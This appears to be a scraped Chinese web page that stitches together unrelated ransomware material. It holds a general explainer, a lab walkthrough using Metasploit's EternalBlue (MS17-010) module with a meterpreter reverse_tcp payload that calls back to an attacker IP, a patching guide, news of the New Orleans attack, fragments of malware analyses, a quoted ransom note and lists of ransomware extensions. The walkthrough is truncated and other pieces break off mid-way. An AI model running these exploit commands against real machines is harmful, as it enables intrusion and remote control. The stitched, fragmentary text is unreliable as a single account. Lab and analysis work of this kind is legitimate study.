勒索

勒索病毒是什么？ 勒索病毒，是一种新型电脑病毒，主要以邮件、程序***、网页挂马的形式进行传播。该病毒性质恶劣、危害极大，一旦感染将给用户带来无法估量的损失。 ***的样本以exe、js、wsf、vbe等类型为主，勒索病毒文件进入本地后，就会自动运行，同时删除勒索软件样本，以躲避查杀和分析。接下来，勒索病毒会利用本地的互联网访问权限连接至勒索者的C&C服务器，进而上传本机信息并下载加密私钥与公钥，文件会被以AES＋RSA4096位的算法加密。除了病毒开发者本人，其他人是几乎不可能解密的。 加密完成后，还会修改壁纸，在桌面等明显位置生成勒索提示文件，指导用户去缴纳赎金，即必须支付勒索资金，才能拿到解密的私钥，或者选择丢失文件。勒索病毒变种类型非常快，对常规的杀毒软件都具有免疫性。 据公开资料显示，全球最早的勒索病毒雏形诞生于1989年，由Joseph Popp编写，该***程序以“艾滋病信息引导盘”的形式进入系统。 中国大陆第一个勒索软件——Redplus勒索***(Trojan/Win32.Pluder)出现在2006年，该***会隐藏用户文档和包裹文件，然后弹出窗口要求用户将赎金汇入指定银行账号。 2019年勒索病毒事件 2019年应该是勒索病毒针对企业***爆发的一年，这一年全球各地仿佛都在被“勒索”，每天全球各地都有不同的政府、企业、组织机构被勒索病毒***的新闻被曝光

一、 环境准备 需准备如下环境及工具： 1) 一台攻击虚机（Kali linux）,一台靶机（Win7 64位） 3) 永恒之蓝（wannacry）病毒文件 二、 环境准备 1.在kali linux下启动 msfconsole 通过该应用，可以访问和使用所有的metasploit的插件，payload，利用模块，post模块等。 root@kali:~#msfconsole 2.利用永恒之蓝MS17-010漏洞 msf > use exploit/windows/smb/ms17_010_eternalblue 3. 设定靶机 IP 和操作机 IP 172.22.170.4为操作机kali-linux ip地址 172.22.171.4为靶机windows 7 ip地址 msf exploit (windows/smb/ms17_010_eternalblue) > set rhost 172.22.171.4 msf exploit (windows/smb/ms17_010_eternalblue) > set lhost 172.22.170.4 4.设置TCP连接 使用meterpreter编写的TCP反弹连接木马，用于在渗透成功后向攻击机发起连接请求进一步控制靶机的模块。 set payload windows/x64/meterpreter/reverse_tcp 5

最近出现震惊的蠕虫病毒（勒索病毒），微软也做出相应的安全补丁来修复 MS17-010。这时有些同学不想打开电脑 的自动更新，这样会下载大量补丁，要更新完这些补丁要好几个小时，为了不影响正常工作，我们就更新 上面指定的补丁 下面我要讲的方法，也适合其它指定要修复的补丁操作，这次以 MS17-010 补丁为例，演示如下安装： 第一步: 打开微软的技术中心 https://technet.microsoft.com/zh-cn/ 搜索 MS17-010 第二步： 找到自己电脑对应的补丁，注意，微软只提供win7以后版本的补丁，xp就不要在这里找了 查看自己电脑操作系统，右击桌面上的“计算机” 选择 “属性” 可以看到我是win7的64位操作系统，接着我们在安全补丁页往下找（若32位的就找对应32位的补丁，不要弄乱了） 找到对应，就单击进去（我们为了快一点，只要选择仅用于安全更新就可以） 第三步： 进入具体补丁号的页面，找到单独下载补丁的超链接 单击后进入下载页面： 第四步： 单击下载到本地 可以看到编号是4012212 ，对应 x64, 是64位操作系统， 第五步： 安装，只要双击它就可以，然后点 下一步，就可以 我的电脑已经安装这个补丁，就提示我不要再装了，若大家的电脑没有装了就会开始安装，安装时要等几分钟 不会很长时间的，安装完成，它会提醒我们重启电脑应用这个补丁

导读 这些年网络的发展的确给我们带来了很多便利，但是同样也给***们带来更多的可能。今天小聪就给大家分享一下让我们极其厌烦的几种网络安全威胁。 说到网络威胁可能很多人都会深恶痛绝，因为实在是备受困扰。小到个人的信息泄露，大到企业、国家的财务损失以及机密信息外漏。最近看到Webroot发布了一个年度恶意软件列表，向我们展示了2019年最臭名昭著的网络安全威胁!从***次数最多的勒索软件和加密挖矿，到破坏最大的网络钓鱼***，让我们的全球网络威胁正在变得更为先进且难以预测。 2019年网络安全威胁统计2019年网络安全威胁统计 这些年网络的发展的确给我们带来了很多便利，但是同样也给***们带来更多的可能。今天小聪就给大家分享一下让我们极其厌烦的几种网络安全威胁： 第一、勒索软件 勒索软件是在前几年针对性***的模式下开始慢慢成熟的。中小型企业由于在安全预算和技能方面的限制，仍然是勒索软件的主要目标。不管是针对员工的网络钓鱼***还是利用不安全的RDP进行强行勒索，勒索软件都像以往一样有效。包括： Emotet-Trickbot-Ryuk(“三合一威胁”)：就经济损失而言，这是2019年最成功的组合一。他们把重点更多地转移到了侦察行动上。感染目标网络后分配一个值，然后在横向移动和部署勒索软件后发送该金额的赎金。 Trickbot / Ryuk

　　12 月 15 日，据外媒报道，<strong>美国新奥尔良市遭到大规模勒索软件***，市长 LaToya Cantrell 宣布全市进入紧急状态。</strong> 　　国土安全和应急准备办公室补充了许多细节，本次袭击从当地时间 12 月 13 日凌晨 5 点开始，随后官方在在纽约市的网络上检测到可疑活动，并于当日上午 11 点检测到了安全事件，为了预防***，<strong>该市 IT 部门已经下达命令，要求所有员工关闭计算机并断开 Wi-Fi 链接，关闭城市服务器电源，并强调要拔掉所有设备的电源。</strong> 　　不过公共摄像头、警察与消防部门、911 报警电话都还在正常运作。市长表示，目前没有收到***的勒索要求，也没有员工被诱骗交出登录详细信息。 　　此前在 10 月 2 日，FBI 曾发布网络***预警，提醒州政府和地方政府应对网络***，FBI 警告说，不仅仅是政府部门，医疗部门、工业公司和运输业也会受到***。 　　而且新奥尔良并非唯一受到勒索软件***美国官方机构，此前路易斯安州、得克萨斯州也都曾遭遇网络***，8 月份一次网络***曾使得克萨斯州 23 个政府机构脱机。 来源： 51CTO 作者： es1xune 链接： https://blog.51cto.com/13390677/2459113

Ransomware勒索病毒 分析报告 样本名 Ransomware.exe 班级 34 期 作者 梅源 时间 2019 年10月25日 平台 VM Windows 7 32 位 15PB信息安全研究院(协议分析报告) 1 ． 样本概况 1.1 应用程序信息 应用程序名称 ：Radamant勒索病毒 大小 : 85824 bytes 修改时间 : 2019-10-26 12:06:22 MD5 值 ： 9b7b16867eeab851d551bfa014166e1a SHA1 值 ： be080d99a299a8708461efce76b524b82142fb28 简单功能介绍：安装自身到C:\User\15pb-win7\AppData\Roaming目录下并重命名为DirectX.exe并将文件属性设置为隐藏后执行，删除自身 ，修改注册表自启动，checkip.dyndns.org发送get请求,接收来自服务器的指令，并执行(病毒更新，发送宿主机信息，加密电脑文件，解密电脑文件) 1.2 分析环境及工具 系统环境:VM Windows 7 32位 工具: PC-Hunter，OD，IDAPro，PEID，Hash,火绒剑 1.3 分析目标 能进行更新病毒，远程操控宿主机，并加密文件 2 ．具体分析过程 2.1 提取样本 • 使用ARK(PC-Hunter)工具查看可以进程 •

还没有从搬新家的喜悦中恢复回来，突然有一天发现，自己的1T的硬盘的历史遗迹里面的文件都不能打开了。尤其是孩子们的珍贵照片。 这可让我着急了好几天。过了几天我才知道，原来是有天晚上，4周岁的儿子自己不知道怎么点了什么，电脑中毒了。 没办法的情况下，先重装了Win10。解决了系统不能登陆的问题。然后，在本周末，花了一个上午的时间，终于用disk genius找回来被加密的文件。 我把截图放在这里。 大致总结一下，这个病毒最近流行很猛，就是勒索病毒。他的本质就是，拿到你机器的管理权，然后给你的文件进行加密，之后把源文件删除了，只保留了加密后的文件。并且会留下一个联系方式。比如我这个是： all your data has been locked us You want to return? Write email recoverydata54@cock.li or recoverydata52@cock.li 虽然运行时间比较长，但是重要文件是可以找回来的。 我的硬盘是HHD，估计SSD应该也可以找回。祝福大家好运。希望以后不要再中毒。 来源： https://www.cnblogs.com/simontaylor/p/11828825.html

/ 文章作者:Kali_MG1937 QQ:3496925334 CSDN博客号:ALDYS4 / 今天逛某论坛的时候发现了一篇求助贴 有意思，好久没分析过恶意软件了 今天就拿它来练练手 反编译工具 apktool jd-gui eclipse(CFR,JD-CORE等反编译引擎) JADX DEX2JAR 0x01>分析AndroidManifest.xml 先看看恶意软件的基本信息 先百度一下恶意软件的包名 搜索结果显示这是一个被各大应用市场收录的软件 那么我分析我手上的这个恶意软件应该是被注入了恶意代码 如果我是恶意软件的开发者， 一定会在第一时间让受害者触发恶意代码 那么先查看软件的主入口 com.superthomaslab.rootessentials.main_screen.MainActivity 看来这就是软件主入口了 0x02>分析代码 跟进主入口 可以看到截屏中的第6行 程序引入了一个包(Unlock.Unlock)，而且我与未被注入代码的软件对照 原软件并没有引入此包 果断搜索Unlock 程序在重写onCreateOptionsMenu方法时调用了Unlock中的方法 并向方法内传入了一个Context 跟进Unlock 查看Unlock方法 在第一句就申请了root权限，emm 不管，先看下去 第12行，变量名为file2的File获取了软件本身的资源

深圳的一个公司中了后缀是adobe的勒索病毒，全部文件后缀变成了[veracrypt@foxmail.com].adobe 公司内中了20几台电脑，中毒后，公司领导特别着急，通过深圳的朋友找到我们，经过我们共同的研究与合作，成功恢复所有被加密文件 勒索病毒如何预防 ： 1、及时给电脑打补丁，修复漏洞。 2、对重要的数据文件定期进行非本地备份。 3、不要点击来源不明的邮件附件，不从不明网站下载软件。 4、尽量关闭不必要的文件共享权限。 5、更改账户密码，设置强密码，避免使用统一的密码，因为统一的密码会导致一台被攻破，多台遭殃。 6、GandCrab勒索软件会利用RDP(远程桌面协议），如果业务上无需使用RDP的，建议关闭RDP 7、找可靠的恢复数据公司解密

SQLServer数据库mdf文件中了勒索病毒.Artemis 865，扩展名变为mdf.Artemis 865 “十二主神”1.0版本的常见的扩展名如下： *.mdf.Zeus666 *.ldf.Zeus666 *.mdf.Poseidon666 *.ldf.Poseidon666 *.mdf.Apollo666 *.ldf.Apollo666 *.mdf.Artemis666 *.ldf.Artemis666 *.mdf.Ares666 *.ldf.Ares666 *.mdf.Aphrodite666 *.ldf.Aphrodite666 *.mdf.Dionysus666 *.ldf.Dionysus666 *.mdf.Persephone666 *.ldf.Persephone666 *.mdf.Hephaestus666 *.ldf.Hephaestus666 *.mdf.Hades666 *.ldf.Hades666 *.mdf.Demeter666 *.ldf.Demeter666 *.mdf.Hera666 *.ldf.Hera666 “十二主神”2.0版本的常见的扩展名如下： *.mdf.Zeus865 *.ldf.Zeus865 *.mdf.Poseidon865 *.ldf.Poseidon865 *.mdf.Apollo865 *.ldf.Apollo865